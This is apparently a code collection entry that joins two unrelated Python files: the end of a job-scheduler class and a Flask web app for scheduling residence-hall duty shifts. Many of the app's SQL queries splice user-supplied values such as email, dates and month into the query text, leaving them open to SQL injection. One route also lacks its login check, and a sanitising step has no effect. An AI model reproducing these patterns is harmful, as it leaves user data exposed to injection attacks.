if not max_number_dumped_items_reducer:
print 'MISSING MAX NUMBER DUMPED ITEMS REDUCER...'
correct = False
elif job_type == 'script':
job_template = self.get_script_template()
template_keys = set(job_template.keys())
job_keys = set(job.keys())
if template_keys != job_keys:
print 'JOB NOT CREATED WITH TEMPLATE...'
correct = False
return correct
# required
job_name = job['job_name']
script_location = job['script_location']
if not job_name:
print 'MISSING JOB NAME...'
correct = False
if not script_location:
print 'MISSING SCRIPT LOCATION...'
correct = False
elif job_type == 'file_transfer':
job_template = self.get_file_transfer_template()
template_keys = set(job_template.keys())
job_keys = set(job.keys())
if template_keys != job_keys:
print 'JOB NOT CREATED WITH TEMPLATE...'
correct = False
return correct
# required
job_name = job['job_name']
if not job_name:
print 'MISSING JOB NAME...'
correct = False
transfer_type = job['transfer_type']
if transfer_type == 'upload' or transfer_type == 'download':
# upload/download
input_dir = job['input_dir']
output_dir = job['output_dir']
if not input_dir:
print 'MISSING INPUT DIRS...'
correct = False
if not output_dir:
print 'MISSING OUTPUT DIR...'
correct = False
if transfer_type == 'upload_auxiliary':
# upload auxiliary
input_file_name = job['input_file_name']
auxiliary_data_name = job['auxiliary_data_name']
if not input_file_name:
print 'MISSING INPUT FILE NAME...'
correct = False
if not auxiliary_data_name:
print 'MISSING AUXILIARY DATA NAME...'
correct = False
if transfer_type == 'delete':
output_dir = job['output_dir']
if not output_dir:
print 'MISSING OUTPUT DIR...'
correct = False
else:
print 'MISSING JOB TYPE...'
correct = False
else:
print 'MISSING JOB PRIORITY...'
correct = False
return correct
def delete_job(self,job_name):
new_jobs = []
existing_jobs = self._get_jobs()
for existing_job in existing_jobs:
existing_job_name = existing_job['job_name']
if existing_job_name != job_name:
new_jobs.append(existing_job)
else:
print 'FOUND JOB/DELETING:'
for key in existing_job:
print '\t',key,existing_job[key]
print '---\n'
attempts = 0
while attempts < 100:
if self._lock_scheduler():
fn = self.local_working_dir +'/JOBS.data'
f = open(fn,'w')
for job in new_jobs:
s = ujson.dumps(job)
f.write(s+'\n')
f.close()
self._unlock_scheduler()
break
else:
attempts = attempts + 1
sleep(random.uniform(0.05,0.10))
def _delete_group(self,job_name):
target_job = self._get_job(job_name)
if target_job:
target_group_name = target_job['group_name']
existing_jobs = self._get_jobs()
for existing_job in existing_jobs:
existing_group_name = existing_job['group_name']
if existing_group_name == target_group_name:
existing_job_name = existing_job['job_name']
self.delete_job(existing_job_name)
else:
print 'NO GROUP FOUND FOR JOB:',job_name
def _get_job(self,job_name):
existing_jobs = self._get_jobs()
for existing_job in existing_jobs:
existing_job_name = existing_job['job_name']
if existing_job_name == job_name:
return existing_job
def _get_jobs(self):
jobs = []
fn = self.local_working_dir +'/JOBS.data'
if not os.path.exists(fn):
f = open(fn,'w')
f.close()
temp = []
attempts = 0
while attempts < 100:
if self._lock_scheduler():
f = open(fn)
for l in f:
job = ujson.loads(l)
job_priority = job['job_priority']
temp.append((job_priority,job))
f.close()
self._unlock_scheduler()
break
else:
attempts = attempts + 1
sleep(random.uniform(0.05,0.10))
temp.sort(reverse=True)
for _,job in temp:
jobs.append(job)
return jobs
def _current_job(self):
current_job = self._read_current_job()
for key in current_job:
val = current_job[key]
print key+':',val
def _read_current_job(self):
fn = self.local_working_dir + '/CURRENT_JOB.data'
f = open(fn)
s = f.read()
f.close()
job = ujson.loads(s)
return job
def _mark_job_as_finished(self,current_job,success,exception,start_time,end_time):
current_job_name = current_job['job_name']
if success:
print 'SUCCESS:',current_job_name
fn = self.local_working_dir + '/JOBS_SUCCESS.data'
self._update_runtime(current_job_name,start_time,end_time)
run_once = current_job['run_once']
if run_once:
self.delete_job(current_job_name)
else:
fn = self.local_working_dir + '/JOBS_FAILED.data'
self._delete_group(current_job_name)
current_job['exception'] = exception
f = open(fn,'a')
s = ujson.dumps(current_job)
f.write(s+'\n')
f.close()
def _update_runtime(self,job_name,start_time,end_time):
runtime = int(end_time - start_time)
fn = self.local_working_dir + '/JOBS_RUNTIME.data'
if not os.path.exists(fn):
runtimes = {}
s = ujson.dumps(runtimes)
f = open(fn,'w')
f.write(s)
f.close()
else:
f = open(fn)
s = f.read()
f.close()
runtimes = ujson.loads(s)
if job_name in runtimes:
runtimes[job_name].append(runtime)
random.shuffle(runtimes[job_name])
runtimes[job_name] = runtimes[job_name][0:50]
else:
runtimes[job_name] = [runtime]
s = ujson.dumps(runtimes)
f = open(fn,'w')
f.write(s)
f.close()
def get_mapreduce_job_template(self):
job = {}
# job/project
job['job_submitter'] = self.job_submitter
job['job_type'] = 'mapreduce'
job['force_run'] = False
job['start_time'] = None
job['end_time'] = None
job['project_name'] = None
job['job_name'] = None
job['group_name'] = None
job['job_priority'] = None
job['input_dirs'] = None
job['delete_job_data'] = True
job['run_once'] = False
job['exception'] = None
job['current_phase'] = None
# mapper
job['map_function_name'] = None
job['auxiliary_data_name_mapper'] = None
job['hold_state'] = False
job['downsample'] = 1.0
# shuffler
job['max_number_dumped_items_shuffler'] = None # was 500000
job['simultaneous_files_in_redis'] = None # was 10
# reducer
job['reduce_function_name'] = None
job['auxiliary_data_name_reducer'] = None
job['max_number_dumped_items_reducer'] = None
job['disk_based_input'] = False
job['disk_based_output'] = False
job['compress'] = False
return job
def get_script_template(self):
job = {}
# job/project
job['job_submitter'] = self.job_submitter
job['job_type'] = 'script'
job['force_run'] = False
job['start_time'] = None
job['end_time'] = None
job['job_name'] = None
job['group_name'] = None
job['job_priority'] = None
job['run_once'] = False
job['exception'] = None
# script
job['script_location'] = None
job['script_arguments'] = None
return job
def get_file_transfer_template(self):
job = {}
# job/project
job['job_submitter'] = self.job_submitter
job['job_type'] = 'file_transfer'
job['force_run'] = False
job['start_time'] = None
job['end_time'] = None
job['job_name'] = None
job['group_name'] = None
job['job_priority'] = None
job['job_exception'] = None
job['run_once'] = False
job['exception'] = None
# upload/download
job['input_dir'] = None
job['output_dir'] = None
job['transfer_type'] = None
job['reload_files'] = True
job['delete_files'] = True
job['compress'] = False
# auxiliary_upload
job['input_file_name'] = None
job['auxiliary_data_name'] = None
return job
def _lock_scheduler(self):
scheduler_token = self.local_working_dir+'/scheduler.lock'
self.scheduler_token = open(scheduler_token,'a')
try:
fcntl.flock(self.scheduler_token, fcntl.LOCK_EX | fcntl.LOCK_NB)
return True
except IOError as e:
if e.errno != errno.EAGAIN:
raise
else:
return False
def _unlock_scheduler(self):
fcntl.flock(self.scheduler_token, fcntl.LOCK_UN)
self.scheduler_token.close()
''' def _mean(self,numbers):
s = sum(numbers)
l = len(numbers)
mean = int(s/l)
return mean
def estimate_next_runtime(self,job_name):
fn = self.local_working_dir + '/JOBS_RUNTIME.data'
f = open(fn)
s = f.read()
f.close()
runtimes = ujson.loads(s)
current_job = self._read_current_job()
current_job_name = current_job['job_name']
if current_job_name == job_name:
print 'JOB IS CURRENTLY RUNNING:',job_name
return
index = 0
job_name_exists = False
existing_jobs = self._get_jobs()
for existing_job in existing_jobs:
existing_job_name = existing_job['job_name']
if existing_job_name == current_job_name:
start_index = index
elif existing_job_name == job_name:
end_index = index
job_name_exists = True
index = index + 1
if job_name_exists:
is_current_job = True
current_time = time()
estimated_next_runtime = current_time
if start_index < end_index:
for index in xrange(start_index,end_index):
existing_job = existing_jobs[index]
existing_job_name = existing_job['job_name']
try:
estimated_job_runtime = self._mean(runtimes[existing_job_name])
if is_current_job:
estimated_next_runtime = estimated_next_runtime + 0.5*estimated_job_runtime
is_current_job = False
else:
estimated_next_runtime = estimated_next_runtime + estimated_job_runtime
except KeyError:
print 'NOT ENOUGH DATA TO CALCULATE AN ESTIMATE'
return
else:
l = len(existing_jobs)
for index in xrange(start_index,l):
existing_job = existing_jobs[index]
existing_job_name = existing_job['job_name']
try:
estimated_job_runtime = self._mean(runtimes[existing_job_name])
if is_current_job:
estimated_next_runtime = estimated_next_runtime + 0.5*estimated_job_runtime
is_current_job = False
else:
estimated_next_runtime = estimated_next_runtime + estimated_job_runtime
except KeyError:
print 'NOT ENOUGH DATA TO CALCULATE AN ESTIMATE'
return
for index in xrange(0,end_index):
existing_job = existing_jobs[index]
existing_job_name = existing_job['job_name']
try:
estimated_job_runtime = self._mean(runtimes[existing_job_name])
estimated_next_runtime = estimated_next_runtime + estimated_job_runtime
except KeyError:
print 'NOT ENOUGH DATA TO CALCULATE AN ESTIMATE'
return
seconds_until_next_run = int(estimated_next_runtime - current_time)
current_time_string = ctime(current_time)
estimated_next_runtime_string = ctime(estimated_next_runtime)
print 'CURRENT TIME:',current_time_string
print 'ESTIMATED NEXT RUNTIME:',estimated_next_runtime_string
print 'SECONDS UNTIL NEXT RUN:',seconds_until_next_run
print 'JOB YET TO RUN:'
if start_index < end_index:
for index in xrange(start_index,end_index):
existing_job = existing_jobs[index]
existing_job_name = existing_job['job_name']
estimated_job_runtime = int(self._mean(runtimes[existing_job_name]))
print '\t',existing_job_name,estimated_job_runtime,'seconds...'
print '---\n'
else:
l = len(existing_jobs)
for index in xrange(start_index,l):
existing_job = existing_jobs[index]
existing_job_name = existing_job['job_name']
estimated_job_runtime = int(self._mean(runtimes[existing_job_name]))
print '\t',existing_job_name,estimated_job_runtime,'seconds...'
for index in xrange(0,end_index):
existing_job = existing_jobs[index]
existing_job_name = existing_job['job_name']
estimated_job_runtime = int(self._mean(runtimes[existing_job_name]))
print '\t',existing_job_name,estimated_job_runtime,'seconds...'
print '---\n'
else:
print 'JOB DOES NOT EXIST:',job_name'''
|
<filename>scheduleServer.py
from flask_login import UserMixin, current_user, LoginManager, login_required, login_user, logout_user
from flask import Flask, render_template, request, jsonify, redirect, url_for
from flask_dance.consumer.backend.sqla import OAuthConsumerMixin, SQLAlchemyBackend
from flask_dance.contrib.google import make_google_blueprint
from flask_dance.consumer import oauth_authorized
from gCalIntegration import gCalIntegratinator
from sqlalchemy.orm.exc import NoResultFound
from flask_sqlalchemy import SQLAlchemy
from flask_bootstrap import Bootstrap
from logging.config import dictConfig
from ra_sched import RA
from io import BytesIO
import scheduler4_0
import copy as cp
import datetime
import psycopg2
import calendar
import logging
import pickle
import os
# Configure the logger immediately per Flask recommendation
# Get the logging level from the environment
logLevel = os.environ["LOG_LEVEL"].upper()
dictConfig({
'version': 1, # logging module specific-- DO NOT CHANGE
'formatters': {'default': {
'format': '[%(asctime)s.%(msecs)d] %(levelname)s in %(module)s: %(message)s',
'datefmt': '%Y-%m-%d %H:%M:%S',
}},
'handlers': {'wsgi': {
'class': 'logging.StreamHandler',
'stream': 'ext://flask.logging.wsgi_errors_stream',
'formatter': 'default'
}},
'root': {
'level': logLevel,
'handlers': ['wsgi']
}
})
HOST_URL = os.environ["HOST_URL"]
app = Flask(__name__)
app.config['TEMPLATES_AUTO_RELOAD'] = True
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ["DATABASE_URL"]
Bootstrap(app)
# Setup for flask_dance with oauth
app.secret_key = os.environ["SECRET_KEY"]
gBlueprint = make_google_blueprint(
client_id=os.environ["CLIENT_ID"],
client_secret=os.environ["CLIENT_SECRET"],
scope=["profile", "email"],
redirect_to="index"
)
app.register_blueprint(gBlueprint, url_prefix="/login")
# Establish DB connection
conn = psycopg2.connect(os.environ["DATABASE_URL"])
# Set up baseOpts to be sent to each HTML template
baseOpts = {
"HOST_URL": os.environ["HOST_URL"]
}
# Instantiate gCalIntegratinator
gCalInterface = gCalIntegratinator()
ALLOWED_EXTENSIONS = {'txt','csv'}
UPLOAD_FOLDER = "./static"
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
db = SQLAlchemy(app) # SQLAlchemy is used for OAuth
login_manager = LoginManager() # The login manager for the application
login_manager.init_app(app)
# The following classes are for SQLAlchemy to understand how the database is set up for OAuth
class User(UserMixin,db.Model): # Contains information about the user
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(250), unique=True)
ra_id = db.Column(db.Integer, unique=True)
class OAuth(OAuthConsumerMixin,db.Model): # Contains information about OAuth tokens
provider_user_id = db.Column(db.String(256), unique=True)
user_id = db.Column(db.Integer, db.ForeignKey(User.id)) # This links the tokens to the user
user = db.relationship(User)
# The following creates the backend for flask_dance which associates users to OAuth tokens
# user_required is set to False because of issues when users would first arrive to the
# application before being authorized by Google and flask_dance would not be able to look
# them up since they were not already authorized. By setting it to False, the app does not
# require a user to already exist in our database to continue.
gBlueprint.backend = SQLAlchemyBackend(OAuth, db.session, user=current_user, user_required=False)
# Format date and time information for calendar
ct = datetime.datetime.now()
fDict = {"text_month":calendar.month_name[(ct.month+1)%12], "num_month":(ct.month+1)%12, "year":(ct.year if ct.month <= 12 else ct.year+1)}
cDict = {"text_month":calendar.month_name[ct.month], "num_month":ct.month, "year":ct.year}
cc = calendar.Calendar(6) #format calendar so Sunday starts the week
# -- OAuth Decorators --
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
@app.before_request
def before_request():
if request.url.startswith('http://'):
url = request.url.replace('http://', 'https://', 1)
code = 301
return redirect(url, code=code)
@oauth_authorized.connect_via(gBlueprint)
def googleLoggedIn(blueprint,token):
logging.info('googleLoggedIn')
if not token: # If we don't have a token
return False
resp = blueprint.session.get("/oauth2/v2/userinfo")
if not resp.ok: # If the response is bad
logging.info("NOT OK")
return False
google_info = resp.json()
username = google_info["email"]
gID = str(google_info["id"])
query = OAuth.query.filter_by(provider=blueprint.name, # Query to find OAuth token in database
provider_user_id=gID)
try:
oauth = query.one() # Execute the query
except NoResultFound: # If there are no results
logging.info("NO OAUTH")
oauth = OAuth(provider=blueprint.name, # Create a new entry in our database
provider_user_id=gID,
token=token)
if oauth.user: # If we have a user
logging.info("LOGGING OAUTH")
login_user(oauth.user) # Log them in
else:
logging.info("CREATE NEW USER")
cur = conn.cursor()
cur.execute("SELECT id FROM ra WHERE email = '{}'".format(username)) # Get the ra with the matching email so that we can link RAs to their emails
raId = cur.fetchone()
cur.close()
user = User(username=username,ra_id=raId) # Create a new user in the database
oauth.user = user # Associate it with the OAuth token
db.session.add_all([user,oauth])
db.session.commit() # Commit changes
login_user(user) # Login user
return False # Function should return False so that flask_dance won't try to store the token itself
# -- Helper Functions --
def getAuth():
logging.debug("Start getAuth")
uEmail = current_user.username # The email returned from Google
cur = conn.cursor()
cur.execute("""
SELECT ra.id, username, first_name, last_name, hall_id, auth_level, res_hall.name
FROM "user" JOIN ra ON ("user".ra_id = ra.id)
JOIN res_hall ON (ra.hall_id = res_hall.id)
WHERE username = '{}';""".format(uEmail))
res = cur.fetchone() # Get user info from the database
if res == None: # If user does not exist, go to error url
logging.warning("No user found with email: {}".format(uEmail))
cur.close()
return redirect(url_for(".err",msg="No user found with email: {}".format(uEmail)))
cur.close()
return {"uEmail":uEmail,"ra_id":res[0],"name":res[2]+" "+res[3],
"hall_id":res[4],"auth_level":res[5],"hall_name":res[6]}
def stdRet(status, msg):
# Helper function to create a standard return object to help simplify code
# going back to the client when no additional data is to be sent.
logging.debug("Generate Standard Return")
return {"status":status,"msg":msg}
def fileAllowed(filename):
logging.debug("Checking if file is allowed")
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
def validateUpload(partList):
logging.debug("Validating Upload")
pl = []
for i in partList:
i.replace("%","")
i.replace(";","")
i.replace("\\","")
pl.append(i)
valid = True
reasons = []
if len(partList) != 6:
valid = False
reasons.append("Expected 5 Parameters, Received: {}".format(len(partList)))
logging.debug("PartList: "+str(partList))
else:
fName, lName, email, start, color, role = pl
# Check Email Address
if "@" not in email and "." not in email:
valid = False
reasons.append(fName+" "+lName+" - Invalid Email Address: "+email)
logging.debug("RA Email: "+email)
# Check Start Date
splitDate = start.split("/")
if len(splitDate) != 3 or "-" in start or int(splitDate[0]) > 12 or \
int(splitDate[1]) > 31 or int(splitDate[2]) < 1:
valid = False
reasons.append(fName+" "+lName+" - Invalid Start Date: "+start)
logging.debug("RA Start Date: "+start)
# Check Color
if len(color) != 7:
valid = False
reasons.append(fName+" "+lName+" - Invalid Color Format: {} Must be in 6-digit, hex format preceeded by a '#'".format(color))
logging.debug("RA Color: "+color)
return pl, valid, reasons
def getSchoolYear(month, year):
# Figure out what school year we are looking for
logging.debug("Calculate School Year: {} {}".format(month, year))
if int(month) >= 8:
# If the current month is August or later
# then the current year is the startYear
startYear = int(year)
endYear = int(year) + 1
else:
# If the current month is earlier than August
# then the current year is the endYear
startYear = int(year) - 1
endYear = int(year)
# TODO: Currently, a school year is considered from August to August.
# Perhaps this should be configurable by the AHD/HDs?
start = str(startYear) + '-08-01'
end = str(endYear) + '-07-31'
logging.debug("Start: "+ start)
logging.debug("End: "+ end)
return start, end
def getCurSchoolYear():
# Figure out what school year we are looking for
logging.debug("Calculate Current School Year")
month = datetime.date.today().month
year = datetime.date.today().year
return getSchoolYear(month, year)
def formatDateStr(day, month, year, format="YYYY-MM-DD", divider="-"):
# Generate a date string so that it follows the provided format.
# Make sure the day is two digits
if day < 10:
dayStr = "0" + str(day)
else:
dayStr = str(day)
# Make sure the month is two digits
if month < 10:
monthStr = "0" + str(month)
else:
monthStr = str(month)
# Figure out what the desired format is
# this can be done by splitting the format string
# by the divider and checking each part to see
# if it contains a "Y", "M", or "D"
partList = format.split(divider)
result = ""
for part in partList:
if "Y" in part.upper():
result += str(year)
elif "M" in part.upper():
result += monthStr
elif "D" in part.upper():
result += dayStr
# Add the divider to the result
result += divider
return result[:-1]
# -- Views --
@app.route("/logout")
@login_required
def logout():
logging.info("Logout User")
logout_user()
return redirect(url_for('.login'))
@app.route("/")
def login():
logging.info("Redirect to Google Login")
return redirect(url_for("google.login"))
@app.route("/home")
@login_required
def index():
userDict = getAuth() # Get the user's info from our database
if type(userDict) != dict:
return userDict
return render_template("index.html",auth_level=userDict["auth_level"], \
curView=1, opts=baseOpts, hall_name=userDict["hall_name"])
@app.route("/conflicts")
def conflicts():
userDict = getAuth() # Get the user's info from our database
return render_template("conflicts.html", auth_level=userDict["auth_level"], \
curView=2, opts=baseOpts, hall_name=userDict["hall_name"])
@app.route("/editSched")
@login_required
def editSched():
userDict = getAuth() # Get the user's info from our database
if userDict["auth_level"] < 2:
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
start, end = getCurSchoolYear()
ptDict = getRAStats(userDict["hall_id"], start, end)
logging.debug("Point Dict: {}".format(ptDict))
cur = conn.cursor()
cur.execute("SELECT id, first_name, last_name, color FROM ra WHERE hall_id = {} ORDER BY first_name ASC;".format(userDict["hall_id"]))
# Sort alphabetically by last name of RA
#ptDictSort = lambda kv: kv[1]["name"].split(" ")[1]
return render_template("editSched.html", raList=cur.fetchall(), auth_level=userDict["auth_level"], \
ptDict=sorted(ptDict.items(), key=lambda x: x[1]["name"].split(" ")[1] ), \
curView=3, opts=baseOpts, hall_name=userDict["hall_name"])
@app.route("/editCons")
@login_required
def editCons():
userDict = getAuth()
if userDict["auth_level"] < 2:
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
cur = conn.cursor()
cur.execute("SELECT id, first_name, last_name, color FROM ra WHERE hall_id = {} ORDER BY first_name ASC;".format(userDict["hall_id"]))
return render_template("editCons.html", raList=cur.fetchall(), auth_level=userDict["auth_level"], \
curView=3, opts=baseOpts, hall_name=userDict["hall_name"])
@app.route("/staff")
@login_required
def manStaff():
userDict = getAuth() # Get the user's info from our database
if userDict["auth_level"] < 3:
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
start, end = getCurSchoolYear()
cur = conn.cursor()
cur.execute("SELECT ra.id, first_name, last_name, email, date_started, res_hall.name, color, auth_level \
FROM ra JOIN res_hall ON (ra.hall_id = res_hall.id) \
WHERE hall_id = {} ORDER BY ra.id ASC;".format(userDict["hall_id"]))
ptStats = getRAStats(userDict["hall_id"], start, end)
return render_template("staff.html",raList=cur.fetchall(),auth_level=userDict["auth_level"], \
opts=baseOpts,curView=4, hall_name=userDict["hall_name"], pts=ptStats)
@app.route("/hall")
@login_required
def manHall():
userDict = getAuth()
if userDict["auth_level"] < 3:
logging.info("User Not Authorized - RA: {} attempted to reach Manage Hall page".format(userDict["ra_id"]))
return jsonify(stdRet(-1, "NOT AUTHORIZED"))
return render_template("hall.html", opts=baseOpts, curView=4, settingList=getHallSettings(userDict["hall_id"]),
auth_level=userDict["auth_level"], hall_name=userDict["hall_name"])
@app.route("/editBreaks", methods=['GET'])
@login_required
def editBreaks():
userDict = getAuth()
if userDict["auth_level"] < 2:
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
start, end = getCurSchoolYear()
logging.debug(start)
logging.debug(end)
bkDict = getRABreakStats(userDict["hall_id"], start, end)
logging.debug(bkDict)
cur = conn.cursor()
cur.execute("SELECT id, first_name, last_name, color FROM ra WHERE hall_id = {} ORDER BY first_name ASC;".format(userDict["hall_id"]))
return render_template("editBreaks.html", raList=cur.fetchall(), auth_level=userDict["auth_level"], \
bkDict=sorted(bkDict.items(), key=lambda x: x[1]["name"].split(" ")[1] ), \
curView=3, opts=baseOpts, hall_name=userDict["hall_name"])
# -- API --
@app.route("/api/enterConflicts/", methods=['POST'])
@login_required
def processConflicts():
logging.debug("Process Conflicts")
userDict = getAuth() # Get the user's info from our database
ra_id = userDict["ra_id"]
hallId = userDict["hall_id"]
logging.debug(request.json)
monthNum = request.json["monthNum"]
year = request.json["year"]
conflicts = request.json["conflicts"]
cur = conn.cursor()
cur.execute("""SELECT TO_CHAR(day.date, 'YYYY-MM-DD')
FROM conflicts JOIN day ON (conflicts.day_id = day.id)
JOIN ra ON (ra.id = conflicts.ra_id)
JOIN month ON (month.id = day.month_id)
WHERE num = {}
AND EXTRACT(YEAR from year) = {}
AND hall_id = {}
AND ra.id = {};""".format(monthNum,year, \
userDict["hall_id"],userDict["ra_id"]))
prevConflicts = cur.fetchall()
prevSet = set([ i[0] for i in prevConflicts ])
newSet = set(conflicts)
# Get a set of dates that were previously entered but are not in the latest
# These items should be removed from the DB
deleteSet = prevSet.difference(newSet)
# Get a set of dates that have been submitted that were not previously
# These items shoudl be inserted into the DB
addSet = newSet.difference(prevSet)
cur = conn.cursor()
logging.debug("DataConflicts: {}".format(conflicts))
logging.debug("PrevSet: {}".format(prevSet))
logging.debug("NewSet: {}".format(newSet))
logging.debug("DeleteSet: {}, {}".format(deleteSet, str(deleteSet)[1:-1]))
logging.debug("AddSet: {}, {}".format(addSet, str(addSet)[1:-1]))
if len(deleteSet) > 0:
cur.execute("""DELETE FROM conflicts
WHERE conflicts.day_id IN (
SELECT conflicts.day_id
FROM conflicts
JOIN day ON (conflicts.day_id = day.id)
WHERE TO_CHAR(day.date, 'YYYY-MM-DD') IN ({})
AND conflicts.ra_id = {}
);""".format(str(deleteSet)[1:-1],userDict["ra_id"]))
if len(addSet) > 0:
cur.execute("""INSERT INTO conflicts (ra_id, day_id)
SELECT {}, day.id FROM day
WHERE TO_CHAR(day.date, 'YYYY-MM-DD') IN ({})
""".format(userDict["ra_id"], str(addSet)[1:-1]))
conn.commit()
cur.close()
return jsonify(stdRet(1,"successful")) # Send the user back to the main page (Not utilized by client currently)
@app.route("/api/getStaffInfo", methods=["GET"])
@login_required
def getStaffStats():
userDict = getAuth()
if userDict["auth_level"] < 3: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
cur = conn.cursor()
cur.execute("""SELECT ra.id, first_name, last_name, email, date_started, res_hall.name, color, auth_level
FROM ra JOIN res_hall ON (ra.hall_id = res_hall.id)
WHERE hall_id = {} ORDER BY ra.id DESC;""".format(userDict["hall_id"]))
start, end = getCurSchoolYear()
pts = getRAStats(userDict["hall_id"], start, end)
ret = {"raList":cur.fetchall(), "pts":pts}
return jsonify(ret)
@app.route("/api/getStats", methods=["GET"])
@login_required
def getRAStats(hallId=None, startDateStr=None, endDateStr=None, maxBreakDay=None):
# API Hook that will get the RA stats for a given month.
# The month will be given via request.args as 'monthNum' and 'year'.
# The server will then query the database for the appropriate statistics
# and send back a json object.
fromServer = True
if hallId is None and startDateStr is None \
and endDateStr is None and maxBreakDay is None: # Effectively: If API was called from the client and not from the server
userDict = getAuth() # Get the user's info from our database
hallId = userDict["hall_id"]
fromServer = False
startDateStr = request.args.get("start")
endDateStr = request.args.get("end")
logging.debug("Get RA Stats - FromServer: {}".format(fromServer))
res = {}
cur = conn.cursor()
breakDutyStart = startDateStr
if maxBreakDay is None:
# If maxBreakDay is None, then we should calculate the TOTAL number of points
# that each RA has for the course of the period specified (including
# all break duties).
breakDutyEnd = endDateStr
else:
# If maxBreakDay is NOT None, then we should calculate the number of REGULAR
# duty points plus the number of BREAK duty points for the specified month.
breakDutyEnd = maxBreakDay
logging.debug("breakDutyStart: {}".format(breakDutyStart))
logging.debug("breakDutyEnd: {}".format(breakDutyEnd))
cur.execute("""SELECT ra.id, ra.first_name, ra.last_name, COALESCE(ptQuery.pts,0)
FROM
(
SELECT combined_res.rid AS rid, CAST(SUM(combined_res.pts) AS INTEGER) AS pts
FROM
(
SELECT ra.id AS rid, SUM(duties.point_val) AS pts
FROM duties JOIN day ON (day.id=duties.day_id)
JOIN ra ON (ra.id=duties.ra_id)
WHERE duties.hall_id = {}
AND duties.sched_id IN
(
SELECT DISTINCT ON (schedule.month_id) schedule.id
FROM schedule
WHERE schedule.hall_id = {}
AND schedule.month_id IN
(
SELECT month.id
FROM month
WHERE month.year >= TO_DATE('{}', 'YYYY-MM-DD')
AND month.year <= TO_DATE('{}', 'YYYY-MM-DD')
)
ORDER BY schedule.month_id, schedule.created DESC, schedule.id DESC
)
GROUP BY rid
UNION
SELECT ra.id AS rid, SUM(break_duties.point_val) AS pts
FROM break_duties JOIN day ON (day.id=break_duties.day_id)
JOIN ra ON (ra.id=break_duties.ra_id)
WHERE break_duties.hall_id = {}
AND day.date BETWEEN TO_DATE('{}', 'YYYY-MM-DD')
AND TO_DATE('{}', 'YYYY-MM-DD')
GROUP BY rid
) AS combined_res
GROUP BY combined_res.rid
) ptQuery
RIGHT JOIN ra ON (ptQuery.rid = ra.id)
WHERE ra.hall_id = {};""".format(hallId, hallId, startDateStr, \
endDateStr, hallId, breakDutyStart, \
breakDutyEnd, hallId))
raList = cur.fetchall()
for ra in raList:
res[ra[0]] = { "name": ra[1] + " " + ra[2], "pts": ra[3] }
cur.close()
if fromServer:
# If this function call is from the server, simply return the results
return res
else:
# Otherwise, if this function call is from the client, return the
# results as a JSON response object.
return jsonify(res)
@app.route("/api/getSchedule", methods=["GET"])
@login_required
def getSchedule2(start=None,end=None,hallId=None, showAllColors=None):
# API Hook that will get the requested schedule for a given month.
# The month will be given via request.args as 'monthNum' and 'year'.
# The server will then query the database for the appropriate schedule
# and send back a jsonified version of the schedule. If no month and
# subsequently no schedule is found in the database, the server will
# return an empty list
fromServer = True
if start is None and end is None and hallId is None and showAllColors is None: # Effectively: If API was called from the client and not from the server
start = request.args.get("start").split("T")[0] # No need for the timezone in our current application
end = request.args.get("end").split("T")[0] # No need for the timezone in our current application
showAllColors = request.args.get("allColors") == "true" # Should all colors be displayed or only the current user's colors
userDict = getAuth() # Get the user's info from our database
hallId = userDict["hall_id"]
fromServer = False
logging.debug("Get Schedule - From Server: {}".format(fromServer))
res = []
cur = conn.cursor()
cur.execute("""
SELECT ra.first_name, ra.last_name, ra.color, ra.id, TO_CHAR(day.date, 'YYYY-MM-DD')
FROM duties JOIN day ON (day.id=duties.day_id)
JOIN RA ON (ra.id=duties.ra_id)
WHERE duties.hall_id = {}
AND duties.sched_id IN
(
SELECT DISTINCT ON (schedule.month_id) schedule.id
FROM schedule
WHERE schedule.hall_id = {}
AND schedule.month_id IN
(
SELECT month.id
FROM month
WHERE month.year >= TO_DATE('{}','YYYY-MM')
AND month.year <= TO_DATE('{}','YYYY-MM')
)
ORDER BY schedule.month_id, schedule.created DESC, schedule.id DESC
)
AND day.date >= TO_DATE('{}','YYYY-MM-DD')
AND day.date <= TO_DATE('{}','YYYY-MM-DD')
ORDER BY day.date ASC;
""".format(hallId, hallId, start[:-3], end[:-3], start, end))
rawRes = cur.fetchall()
logging.debug("RawRes: {}".format(rawRes))
for row in rawRes:
# If the ra is the same as the user, then display their color
# Otherwise, display a generic color.
# logging.debug("Ra is same as user? {}".format(userDict["ra_id"] == row[3]))
if not(showAllColors):
# If the desired behavior is to not show all of the unique RA colors
# then check to see if the current user is the ra on the duty being
# added. If it is the ra, show their unique color, if not, show the
# same color.
if userDict["ra_id"] == row[3]:
c = row[2]
else:
c = "#2C3E50"
# If the desired behavior is to show all of the unique RA colors, then
# simply set their color.
else:
c = row[2]
res.append({
"id": row[3],
"title": row[0] + " " + row[1],
"start": row[4],
"color": c,
"extendedProps": {"dutyType": "std"}
})
if fromServer:
return res
else:
return jsonify(res)
@app.route("/api/getMonth", methods=["GET"])
def getMonth(monthNum=None,year=None):
# API Hook that will get the requested month format.
# This function generates a blank calendar to return to the client for
# the given year and monthNum (1-12)
if monthNum == None and year == None: # Effectively: If API was called from the client and not from the server
monthNum = int(request.args.get("monthNum"))
year = int(request.args.get("year"))
logging.debug("Get Month - MonthNum: {}, Year: {}".format(monthNum, year))
res = {}
dateList = []
for week in cc.monthdayscalendar(year,monthNum):
weeklst = []
for day in week:
weeklst.append({"date":day,"ras":[]})
dateList.append(weeklst)
res["dates"] = dateList
res["month"] = calendar.month_name[monthNum]
return jsonify(res)
@app.route("/api/runScheduler", methods=["POST"])
def runScheduler(hallId=None, monthNum=None, year=None):
# API Hook that will run the scheduler for a given month.
# The month will be given via request.args as 'monthNum' and 'year'.
# Additionally, the dates that should no have duties are also sent via
